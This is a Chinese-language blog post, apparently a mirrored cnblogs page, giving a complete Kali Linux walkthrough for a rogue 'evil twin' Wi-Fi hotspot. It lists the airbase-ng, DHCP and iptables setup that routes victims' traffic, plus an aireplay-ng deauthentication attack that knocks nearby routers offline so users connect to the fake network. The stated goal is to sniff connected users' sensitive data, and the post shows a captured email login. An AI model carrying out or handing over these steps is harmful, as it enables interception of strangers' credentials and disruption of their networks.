zoukankan      html  css  js  c++  java
  • 创建假的wifi热点

    本帖介绍怎么创建假的wifi热点,然后抓取连接到这个wifi用户的敏感数据。我们还会给周围的无线路由器发送未认证的包,使这些路由器瘫痪,强迫用户连接(或自动连接)我们创建的假wifi热点。

    这种攻击也叫”水坑攻击”-把其他用户都聚集到一个”坑”中。

    系统要求:

    • Kali Linux
    • 本地有线网络连接(网络接口 eth0)
    • 无线网卡支持包注入模式和监控模式 (网络接口 wlan0)
    • 各种抓包工具-Wireshark、 ettercap、tcpdump…

    获得默认网关

    # route -n
    

    这个值在设置iptables时会用到。

    安装DHCP服务

    用处: 为连接假wifi的用户分配IP。

    # apt-get install isc-dhcp-server
    

    配置DHCP:

    # vim /etc/dhcp/dhcpd.conf
    

    文件中内容:

    authoritative;
    default-lease-time 600;
    max-lease-time 7200;
    
    subnet 192.168.10.0 netmask 255.255.255.0 {
       option routers 192.168.10.1;
       option subnet-mask 255.255.255.0;
       option domain-name "freewifi";
       option domain-name-servers 8.8.8.8,8.8.4.4,192.168.0.1;
       range 192.168.10.100 192.168.10.140;
    }
    
    

    先不启动DHCP服务。

    进入无线网卡的监控模式

    # airmon-ng start wlan0
    # airmon-ng check kill
    

    把wlan0替换为你的无线网卡接口。

    要退出监控模式,执行:

    # airmon-ng stop wlan0mon
    

    创建wifi热点

    # airbase-ng -c 11 -e fake_wifi wlan0mon
    

    不要终止这个命令。

    现在你已经创建了一个wifi热点,但是这个wifi目前还不能连接。

    设置网络和防火墙规则

    # ifconfig at0 up
    # ifconfig at0 192.168.10.1 netmask 255.255.255.0
    # ifconfig at0 mtu 1400
    # route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.1
    # iptables --flush
    # iptables --table nat --flush
    # iptables --delete-chain
    # iptables --table nat --delete-chain
    # echo 1 > /proc/sys/net/ipv4/ip_forward
    # iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.0.1
    # iptables -P FORWARD ACCEPT
    # iptables --append FORWARD --in-interface at0 -j ACCEPT
    # iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    

    启动DHCP服务

    # dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
    # systemctl start isc-dhcp-server
    

    遇到的问题:

    PID file: /var/run/dhcpd.pid
    Can't open lease database /var/lib/dhcp/dhcpd.leases: No such file or directory --
    

    创建这个文件解决这个问题:

    # mkdir /var/lib/dhcp/
    # touch /var/lib/dhcp/dhcpd.leases
    

    到此,wifi热点创建完成

    瘫痪其他路由

    列出周围的wifi:

    # airodump-ng wlan0mon
    

    然后选择你的目标,记住BSSID和频道。

    设置频道:

    # iwconfig wlan0mon channel <频道号>
    

    开始deauthentication攻击:

    # aireplay-ng -0 5000 -a <BSSID> wlan0mon --ignore-negative-one
    

    OK,现在你可以愉快的抓包了。


    例如使用Wireshark抓包:

    上图抓到了我手机邮件客户端登录的邮箱账户。


    更多:https://github.com/tiancode/learn-hacking

  • 相关阅读:
    loop messenger
    第四层交换
    波导耦合器设计 :CMI 受控模式相互作用
    转chinaunix wingger shell基础十二篇
    CVS 简单教程
    光纤的类型和应用(节选)
    java swing 中tree中数据排序
    谈谈NETBIOS与网上邻居的浏览
    vi大全
    asm基础拾遗
  • 原文地址:https://www.cnblogs.com/daoyi/p/chuang-jian-jia-dewifi-re-dian.html
Copyright © 2011-2022 走看看